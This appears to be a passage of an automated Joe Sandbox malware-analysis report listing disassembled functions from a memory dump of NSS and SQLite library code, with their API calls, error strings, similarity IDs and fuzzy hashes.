                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                          • API String ID: 3333340300-2657877971
                                                                                                                                                                                                                          • Opcode ID: 3b60902260934a85e676dfeb0023df1fbbeb5c93f781a70e9a5b22825df30d05
                                                                                                                                                                                                                          • Instruction ID: 4071b83a5d03b888a061cc4d1c4e767c199035fff28d2b3f510991885750af0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b60902260934a85e676dfeb0023df1fbbeb5c93f781a70e9a5b22825df30d05
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C726D75D052299FDF60DF28CC88F9ABBB5AF49304F1441A9D80DA7701EB31AA85CF91
                                                                                                                                                                                                                          Function 6C403C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403C66
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C403D04
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403EAD
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403ED7
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403F74
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C404052
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C40406F
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C40410D
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C40449C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulong$sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 2597148001-598938438
                                                                                                                                                                                                                          • Opcode ID: 4e22fd8518e754b649f4b143a3675a4a312cbb3ab5959f98efe6f6a3d6b54b82
                                                                                                                                                                                                                          • Instruction ID: 85ebc5645fe9e8d22e758b1a974933a6cf8439fb38406ab36c9365d042f9e2dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e22fd8518e754b649f4b143a3675a4a312cbb3ab5959f98efe6f6a3d6b54b82
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F829C75B40215CFCB04CF69C480F9ABBB2BF99358F2591A8D905ABB51E731EC42CB91
                                                                                                                                                                                                                          Function 6C4DAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C4DACC4
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C4DACD5
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C4DACF3
                                                                                                                                                                                                                          • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C4DAD3B
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C4DADC8
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DADDF
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DADF0
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4DB06A
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DB08C
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4DB1BA
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4DB27C
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00002010), ref: 6C4DB2CA
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4DB3C1
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DB40C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1285963562-0
                                                                                                                                                                                                                          • Opcode ID: e006eef8e4eca0f3b98ee6127328d5f3a2c7fc41dbd0bc686811982adcb2c3ce
                                                                                                                                                                                                                          • Instruction ID: 3c7879ab5c02910b5b40b93fec9718ec6afcaea9f7c0994789f7d05137e82106
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e006eef8e4eca0f3b98ee6127328d5f3a2c7fc41dbd0bc686811982adcb2c3ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C022BE71A04300AFE700EF14CC55F9A77E1AF8430CF25856CE8595B7A2E772E859CB96
                                                                                                                                                                                                                          Function 6C421F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4225F3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • H, xrefs: 6C42329F
                                                                                                                                                                                                                          • cannot join using column %s - column not present in both tables, xrefs: 6C4232AB
                                                                                                                                                                                                                          • too many references to "%s": max 65535, xrefs: 6C422FB6
                                                                                                                                                                                                                          • no such table: %s, xrefs: 6C4226AC
                                                                                                                                                                                                                          • too many columns in result set, xrefs: 6C423012
                                                                                                                                                                                                                          • recursive reference in a subquery: %s, xrefs: 6C4222E5
                                                                                                                                                                                                                          • cannot have both ON and USING clauses in the same join, xrefs: 6C4232B5
                                                                                                                                                                                                                          • '%s' is not a function, xrefs: 6C422FD2
                                                                                                                                                                                                                          • access to view "%s" prohibited, xrefs: 6C422F4A
                                                                                                                                                                                                                          • multiple recursive references: %s, xrefs: 6C4222E0
                                                                                                                                                                                                                          • no tables specified, xrefs: 6C4226BE
                                                                                                                                                                                                                          • H, xrefs: 6C42322D
                                                                                                                                                                                                                          • no such index: "%s", xrefs: 6C42319D
                                                                                                                                                                                                                          • table %s has %d values for %d columns, xrefs: 6C42316C
                                                                                                                                                                                                                          • %s.%s.%s, xrefs: 6C42302D
                                                                                                                                                                                                                          • unsafe use of virtual table "%s", xrefs: 6C4230D1
                                                                                                                                                                                                                          • a NATURAL join may not have an ON or USING clause, xrefs: 6C4232C1
                                                                                                                                                                                                                          • %s.%s, xrefs: 6C422D68
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                                          • API String ID: 3510742995-3400015513
                                                                                                                                                                                                                          • Opcode ID: dfbb6cb7bfce673a14458ee51b07af61acdb06a392534ec69f5b27ad91f17c08
                                                                                                                                                                                                                          • Instruction ID: 0df73f0f68d14d4ffff84c62cb68cf6dfc465f22f528f58ae12982e691c99c92
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfbb6cb7bfce673a14458ee51b07af61acdb06a392534ec69f5b27ad91f17c08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04D2AF70E14209CFDB24CF95C485F9DBBB1FF49328F288169D855ABB51DB39A842CB90
                                                                                                                                                                                                                          Function 6C45ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C45ED38
                                                                                                                                                                                                                            • Part of subcall function 6C3F4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3F4FC4
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(snippet), ref: 6C45EF3C
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(offsets), ref: 6C45EFE4
                                                                                                                                                                                                                            • Part of subcall function 6C51DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C3F5001,?,00000003,00000000), ref: 6C51DFD7
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6C45F087
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6C45F129
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(optimize), ref: 6C45F1D1
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C45F368
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                                                          • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                                          • API String ID: 2518200370-449611708
                                                                                                                                                                                                                          • Opcode ID: 054a2908f7ce6e0132ddeca95b9e5126695c27f784df0f7a33c09236be0c55f1
                                                                                                                                                                                                                          • Instruction ID: 1932adc27df13985bd953630774d69a444771f04c9ecd4b27cd453ee63896bbe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 054a2908f7ce6e0132ddeca95b9e5126695c27f784df0f7a33c09236be0c55f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B02EEB1B057014BF704DF619C85F2B36B2BBC5208F54893CD85A97B40EB79E9668B83
                                                                                                                                                                                                                          Function 6C4D7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D7C33
                                                                                                                                                                                                                          • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C4D7C66
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C4D7D1E
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: SECOID_FindOID_Util.NSS3(?,?,?,6C4D91C5), ref: 6C4D788F
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4D7D48
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C4D7D71
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C4D7DD3
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4D7DE1
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D7DF8
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C4D7E1A
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C4D7E58
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4D91C5), ref: 6C4D78BB
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C4D91C5), ref: 6C4D78FA
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7930
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7951
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D7964
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4D797A
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C4D7988
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C4D7998
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: free.MOZGLUE(00000000), ref: 6C4D79A7
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D79BB
                                                                                                                                                                                                                            • Part of subcall function 6C4D7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C4D91C5), ref: 6C4D79CA
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4D7E49
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4D7F8C
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C4D7F98
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4D7FBF
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C4D7FD9
                                                                                                                                                                                                                          • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C4D8038
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C4D8050
                                                                                                                                                                                                                          • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C4D8093
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3 ref: 6C4D7F29
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C4D8072
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3 ref: 6C4D80F5
                                                                                                                                                                                                                            • Part of subcall function 6C4DBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C4D800A,00000000,?,00000000,?), ref: 6C4DBC3F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2815116071-0
                                                                                                                                                                                                                          • Opcode ID: 529d4b8f5aaafb1214ffb1661fa1b24f15336bd7d13b7941cd53fdf6c6c6791d
                                                                                                                                                                                                                          • Instruction ID: 612b983522e8243ac1a4131cbb06d60ed35fa1bbffc70fcaafc7fc15a2282a88
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 529d4b8f5aaafb1214ffb1661fa1b24f15336bd7d13b7941cd53fdf6c6c6791d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3E1C2706093019FE710EF28D890F6AB7E5AF44709F12492DE8899BB55E732FC05CB92
                                                                                                                                                                                                                          Function 6C461C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6C461C6B
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C461C75
                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C461CA1
                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 6C461CA9
                                                                                                                                                                                                                          • malloc.MOZGLUE(00000000), ref: 6C461CB4
                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C461CCC
                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C461CE4
                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 6C461CEC
                                                                                                                                                                                                                          • malloc.MOZGLUE(00000000), ref: 6C461CFD
                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C461D0F
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6C461D17
                                                                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32 ref: 6C461D4D
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C461D73
                                                                                                                                                                                                                          • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C461D7F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C461D7A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                                          • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                                          • API String ID: 3748115541-1216436346
                                                                                                                                                                                                                          • Opcode ID: 3e8305179aed0449193628a49959adf63202d0607b103ad970aa1416d67ef101
                                                                                                                                                                                                                          • Instruction ID: 6755391e972279a1cfe59d7bdfba78a1f0c7282783b67a1b42084e011ac87112
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e8305179aed0449193628a49959adf63202d0607b103ad970aa1416d67ef101
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 723157B1A01618AFDF10EF64CC48BAA7BB8FF4A345F014169F60992650E7306E94CF6D
                                                                                                                                                                                                                          Function 6C463D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C463DFB
                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C463EEC
                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C463FA3
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C464047
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C4640DE
                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C46415F
                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C46416B
                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C464288
                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4642AB
                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C4642B7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
